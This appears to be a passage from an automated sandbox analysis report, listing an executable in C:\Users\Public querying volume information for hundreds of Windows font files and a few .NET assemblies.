Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
